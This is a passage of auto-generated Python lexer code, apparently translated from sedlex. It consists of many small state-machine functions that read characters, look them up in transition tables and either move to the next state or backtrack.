_sedlex_rnd_313(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_118(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_26(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_312[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_311(lexerbuf: lexbuf): result = -1 result = _sedlex_st_119(lexerbuf) return result def _sedlex_rnd_310(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_117(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_309[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_308(lexerbuf: lexbuf): result = -1 result = _sedlex_st_118(lexerbuf) return result def _sedlex_rnd_307(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_116(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_39(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_306[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_39(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_32[c - 48] - 1 else: return -1 def _sedlex_rnd_305(lexerbuf: lexbuf): result = -1 result = _sedlex_st_121(lexerbuf) return result def _sedlex_rnd_304(lexerbuf: lexbuf): result = -1 result = _sedlex_st_117(lexerbuf) return result def _sedlex_rnd_303(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_115(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_302[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_301(lexerbuf: lexbuf): result = -1 result = _sedlex_st_116(lexerbuf) return result def _sedlex_rnd_300(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_114(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 43) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_299[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_298(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_113(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_297[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_296(lexerbuf: lexbuf): result = -1 result = _sedlex_st_114(lexerbuf) return result def _sedlex_rnd_295(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_112(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 42) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_294[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_293(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_111(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_292[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_291(lexerbuf: lexbuf): result = -1 result = _sedlex_st_112(lexerbuf) return result def _sedlex_rnd_290(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_110(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 41) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_289[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_288(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_109(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_287[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_286(lexerbuf: lexbuf): result = -1 result = _sedlex_st_110(lexerbuf) return result def _sedlex_rnd_285(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_108(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_38(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_284[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_38(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_31[c - 48] - 1 else: return -1 def _sedlex_rnd_283(lexerbuf: lexbuf): result = -1 result = _sedlex_st_111(lexerbuf) return result def _sedlex_rnd_282(lexerbuf: lexbuf): result = -1 result = _sedlex_st_109(lexerbuf) return result def _sedlex_rnd_281(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_107(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 40) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_280[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_279(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_106(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_278[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_277(lexerbuf: lexbuf): result = -1 result = _sedlex_st_107(lexerbuf) return result def _sedlex_rnd_276(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_105(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_26(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_275[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_274(lexerbuf: lexbuf): result = -1 result = _sedlex_st_106(lexerbuf) return result def _sedlex_rnd_273(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_104(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_35(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_272[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_271(lexerbuf: lexbuf): result = -1 result = _sedlex_st_105(lexerbuf) return result def _sedlex_rnd_270(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_103(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_269[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_268(lexerbuf: lexbuf): result = -1 result = _sedlex_st_104(lexerbuf) return result def _sedlex_rnd_267(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_102(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 39) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_266[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_265(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_101(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 38) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_264[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_263(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_100(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_37(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_262[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_37(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_30[c - 48] - 1 else: return -1 def _sedlex_rnd_261(lexerbuf: lexbuf): result = -1 result = _sedlex_st_102(lexerbuf) return result def _sedlex_rnd_260(lexerbuf: lexbuf): result = -1 result = _sedlex_st_101(lexerbuf) return result def _sedlex_rnd_259(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_99(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 37) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_258[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_257(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_98(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_256[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_255(lexerbuf: lexbuf): result = -1 result = _sedlex_st_99(lexerbuf) return result def _sedlex_rnd_254(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_97(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_253[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_252(lexerbuf: lexbuf): result = -1 result = _sedlex_st_98(lexerbuf) return result def _sedlex_rnd_251(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_96(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_250[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_249(lexerbuf: lexbuf): result = -1 result = _sedlex_st_97(lexerbuf) return result def _sedlex_rnd_248(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_95(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 36) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_247[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_246(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_94(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_245[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_244(lexerbuf: lexbuf): result = -1 result = _sedlex_st_95(lexerbuf) return result def _sedlex_rnd_243(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_93(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_242[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_241(lexerbuf: lexbuf): result = -1 result = _sedlex_st_94(lexerbuf) return result def _sedlex_rnd_240(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_92(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_239[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_238(lexerbuf: lexbuf): result = -1 result = _sedlex_st_93(lexerbuf) return result def _sedlex_rnd_237(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_91(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_236[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_36(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_29[c - 48] - 1 else: return -1 def _sedlex_rnd_235(lexerbuf: lexbuf): result = -1 result = _sedlex_st_92(lexerbuf) return result def _sedlex_rnd_234(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_90(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_35(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_233[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_35(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_28[c - 48] - 1 else: return -1 def _sedlex_rnd_232(lexerbuf: lexbuf): result = -1 result = _sedlex_st_91(lexerbuf) return result def _sedlex_rnd_231(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_89(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_230[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_229(lexerbuf: lexbuf): result = -1 result = _sedlex_st_90(lexerbuf) return result def _sedlex_rnd_228(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_88(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 35) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_227[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_226(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_87(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_225[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_224(lexerbuf: lexbuf): result = -1 result = _sedlex_st_88(lexerbuf) return result def _sedlex_rnd_223(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_86(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 34) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_222[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_221(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_85(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_220[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_219(lexerbuf: lexbuf): result = -1 result = _sedlex_st_86(lexerbuf) return result def _sedlex_rnd_218(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_84(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_30(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_217[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_216(lexerbuf: lexbuf): result = -1 result = _sedlex_st_85(lexerbuf) return result def _sedlex_rnd_215(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_83(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_214[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_34(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_27[c - 48] - 1 else: return -1 def _sedlex_rnd_213(lexerbuf: lexbuf): result = -1 result = _sedlex_st_84(lexerbuf) return result def _sedlex_rnd_212(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_82(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_33(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_211[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_33(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_26[c - 48] - 1 else: return -1 def _sedlex_rnd_210(lexerbuf: lexbuf): result = -1 result = _sedlex_st_89(lexerbuf) return result def _sedlex_rnd_209(lexerbuf: lexbuf): result = -1 result = _sedlex_st_87(lexerbuf) return result def _sedlex_rnd_208(lexerbuf: lexbuf): result = -1 result = _sedlex_st_83(lexerbuf) return result def _sedlex_rnd_207(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_81(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 33) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_206[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_205(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_80(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_23(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_204[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_203(lexerbuf: lexbuf): result = -1 result = _sedlex_st_81(lexerbuf) return result def _sedlex_rnd_202(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_79(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 32) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_201[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_200(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_78(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_32(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_199[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_32(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_25[c - 48] - 1 else: return -1 def _sedlex_rnd_198(lexerbuf: lexbuf): result = -1 result = _sedlex_st_79(lexerbuf) return result def _sedlex_rnd_197(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_77(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 31) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_196[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_31(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_24[c - 48] - 1 else: return -1 def _sedlex_rnd_195(lexerbuf: lexbuf): result = -1 result = _sedlex_st_78(lexerbuf) return result def _sedlex_rnd_194(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_76(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_193[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_192(lexerbuf: lexbuf): result = -1 result = _sedlex_st_77(lexerbuf) return result def _sedlex_rnd_191(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_75(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_30(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_190[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_30(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_23[c - 48] - 1 else: return -1 def _sedlex_rnd_189(lexerbuf: lexbuf): result = -1 result = _sedlex_st_76(lexerbuf) return result def _sedlex_rnd_188(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_74(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_29(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_187[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_29(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_22[c - 48] - 1 else: return -1 def _sedlex_rnd_186(lexerbuf: lexbuf): result = -1 result = _sedlex_st_80(lexerbuf) return result def _sedlex_rnd_185(lexerbuf: lexbuf): result = -1 result = _sedlex_st_75(lexerbuf) return result def _sedlex_rnd_184(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_73(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 30) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_183[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_182(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_72(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_181[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_28(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_21[c - 48] - 1 else: return -1 def _sedlex_rnd_180(lexerbuf: lexbuf): result = -1 result = _sedlex_st_73(lexerbuf) return result def _sedlex_rnd_179(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_71(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 29) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_178[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_177(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_70(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_27(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_176[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_27(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_20[c - 48] - 1 else: return -1 def _sedlex_rnd_175(lexerbuf: lexbuf): result = -1 result = _sedlex_st_71(lexerbuf) return result def _sedlex_rnd_174(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_69(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_26(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_173[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_26(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_19[c - 48] - 1 else: return -1 def _sedlex_rnd_172(lexerbuf: lexbuf): result = -1 result = _sedlex_st_70(lexerbuf) return result def _sedlex_rnd_171(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_68(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_170[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_25(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_18[c - 48] - 1 else: return -1 def _sedlex_rnd_169(lexerbuf: lexbuf): result = -1 result = _sedlex_st_69(lexerbuf) return result def _sedlex_rnd_168(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_67(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_167[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_24(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_17[c - 48] - 1 else: return -1 def _sedlex_rnd_166(lexerbuf: lexbuf): result = -1 result = _sedlex_st_68(lexerbuf) return result def _sedlex_rnd_165(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_66(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 28) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_164[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_163(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_65(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_23(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_162[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_23(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_16[c - 48] - 1 else: return -1 def _sedlex_rnd_161(lexerbuf: lexbuf): result = -1 result = _sedlex_st_66(lexerbuf) return result def _sedlex_rnd_160(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_64(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_159[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_22(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_15[c - 48] - 1 else: return -1 def _sedlex_rnd_158(lexerbuf: lexbuf): result = -1 result = _sedlex_st_65(lexerbuf) return result def _sedlex_rnd_157(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_61(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_156[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_155(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_154(lexerbuf: lexbuf): result = -1 result = _sedlex_st_60(lexerbuf) return result def _sedlex_st_60(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_153[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_152(lexerbuf: lexbuf): result = -1 result = _sedlex_st_61(lexerbuf) return result def _sedlex_rnd_151(lexerbuf: lexbuf): result = -1 result = _sedlex_st_60(lexerbuf) return result def _sedlex_st_59(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_150[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_149(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_148(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_58(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_147[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_146(lexerbuf: lexbuf): result = -1 result = _sedlex_st_59(lexerbuf) return result def _sedlex_rnd_145(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_57(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_144[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_143(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_142(lexerbuf: lexbuf): result = -1 result = _sedlex_st_55(lexerbuf) return result def _sedlex_st_56(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_141[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_140(lexerbuf: lexbuf): result = -1 result = _sedlex_st_57(lexerbuf) return result def _sedlex_rnd_139(lexerbuf: lexbuf): result = -1 result = _sedlex_st_55(lexerbuf) return result def _sedlex_st_55(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_138[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_137(lexerbuf: lexbuf): result = -1 result = _sedlex_st_56(lexerbuf) return result def _sedlex_rnd_136(lexerbuf: lexbuf): result = -1 result = _sedlex_st_55(lexerbuf) return result def _sedlex_st_54(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 60) state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_135[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_134(lexerbuf: lexbuf): result = -1 result = _sedlex_st_57(lexerbuf) return result def _sedlex_rnd_133(lexerbuf: lexbuf): result = -1 result = _sedlex_st_55(lexerbuf) return result def _sedlex_st_53(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = 